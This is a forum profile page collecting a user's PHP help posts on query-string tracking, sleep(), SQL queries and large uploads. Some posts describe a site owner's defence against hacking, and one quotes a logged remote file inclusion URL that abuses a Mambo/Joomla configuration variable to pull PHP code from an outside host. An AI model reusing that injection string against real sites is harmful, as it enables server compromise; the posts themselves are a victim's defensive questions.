deansatch
-
Posts
300 -
Joined
-
Last visited
Posts posted by deansatch
-
-
register globals is off by default and I am using php5
-
If you are using php5, what does that matter?
How do you mean?
-
allow_url_fopen is ON. But I need it to be on for a couple of pages. I was hoping there would be some way I can switch it off in php.ini but then switch it on for my script to run, then back off again.
-
After my last successful hack, I disabled allow_url_include. I want to disable allow_url_fopen as well just to be safe, but I use file_get_contents on one part of a page. Is there a way I can just enable it for that script and disable it immediately after?
-
They keep coming back with a different ip every few seconds.
How can code like this actually work? Is there something I can alter in php.ini to make url hacks a waste of time?
-
I had recently had my site hacked and managed to clear it all up. I have been checking my logs and another attempt is being made on my site using injection via the url. They are visiting my site using things like:
http://mysite.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two??
If you look at http://test.bigshop.cz/uploaded/two?? and view the source you can see their php code.
Is there anything I can do to stop them even trying?
-
That will only tell me which page I am coming from, not which link I used. I would still need the query string
-
Why use the query string for tracking at all? Why not just store the value in the user's session.
Because I am trying to see which link was clicked on on a page which may have a few different links to the same page e.g. click here, sign up, and an image - I want to know which one is clicked on.
-
If it continually increases using $i++ then it will be using a loop. e.g. while, for, foreach etc...
-
That works fine for me.
-
Would that not affect my internal link SEO in a negative way though?
-
I have added a little query string to some of my links for tracking e.g. mysite.com/page2.php?track1
For fear of damaging SEO and for vanity, I want that query string to disappear when the user lands on the page. BUT, I want to echo the query string on that page. (don't ask why)
I tried using a rewrite in htaccess:
RewriteCond %{QUERY_STRING} .
RewriteRule ^(.*)page2.php$ http://mysite.com/page2.php$1? [R=301,L]
This removes it fine but it doesn't echo it out since it removes it before it gets to: echo $_SERVER["QUERY_STRING"];
Is there any way to achieve this without affecting my usually 'un-query_stringed' urls with regards to SEO?
-
They are at the bottom and when you click next, the "previous" button appears at the top - only the next button is missing from the top.
-
header("Location: yourpassword.php?CustomerID=" . $_SESSION['CustomerID'] . "");
You can't use php tags inside php.
-
How about using ajax and submitting the details of stage 1 on blur() of the final input for that stage. Something along the lines of how a username field would check for availability when moving to the password field etc...
btw- I assume by having all stages on one page you are meaning that all the form fields will be available in one go? Otherwise just store details in a session
-
Is it in there more than once?
Try:
if($count>0)
-
The only use I can imagine for sleep() is if you are limited to say 1000 emails per hour and you have written a mailing script with more than 1000 recipients you would mail 1000 then slepp() for an hour then mail another 1000 etc... But wouldn't that mean your browser would be open for hours and timeouts would still occur?
-
EITHER:
$Customer = 'Customer';
OR
$sql="SELECT Password FROM Customer WHERE Email='$Email'";
-
I haven't actually got a problem, I am working something out in theory before starting a script to get the best way to do it - i.e. huge file uploads via a browser.
I suggested sleep() as it is something I came across and wondered if a)it would help this and b)what is its uses?
-
So what use would there be for sleep() if all it does is delay the script? Surely we want our scripts o execute as quickly as possible?
-
This does nothing:
$Customer;
It makes your mysql query no table.
\it should be something like this:
$Customer = 'customer_table';
EDIT: You really need to sanitise things first e.g. mysql_real_escape_string(), check valid email types etc...
-
integrate php ftp. I have never done it because i dont need it
I looked into php ftp and from what I can gather, you can't "UPLOAD" via php ftp, you can upload via http (hence my post) then use ftp to transfer it from one server to another (rendering it a pretty useless function in my eyes).
-
Notice how I capitalised "HAVE TO". If it is a site like megaupload or yousendit it would not be done via ftp. Does sleep() not pause the script and then when it restarts the timeout is set back to the beginning too?
-
With a simplified code example, would this not work?
$last=''; $query = mysql_query("SELECT catname,product FROM table ORDER BY catname, product asc"); while($row = mysql_fetch_assoc($query)){ $catname = $row['catname']; $product = $row['product']; if($last != $catname){ echo "<h2>$catname</h2>"; } echo "<p>$product</p>"; $last = $catname; }
Stopping a hack attempt - quickly
in PHP Coding Help
Posted
I'm assuming that a hacker doing these url type exploits is hoping to come across (with luck) an:
sort of thing where they have site.com?hack=http://hackerscode.txt
I noticed a lot of the attempts were using ?page=something or ?pg=something etc...
I still have no idea how they managed to succeed the last time. But they managed to plant a couple of php files that wrote new code to my index file.